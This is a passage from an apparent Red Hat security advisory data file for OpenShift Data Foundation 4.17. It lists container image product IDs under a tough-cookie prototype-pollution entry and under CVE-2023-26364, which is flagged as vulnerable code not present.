"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "tough-cookie: prototype pollution in cookie memstore", }, { cve: "CVE-2023-26364", cwe: { id: "CWE-20", name: "Improper Input Validation", }, discovery_date: "2023-11-17T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", 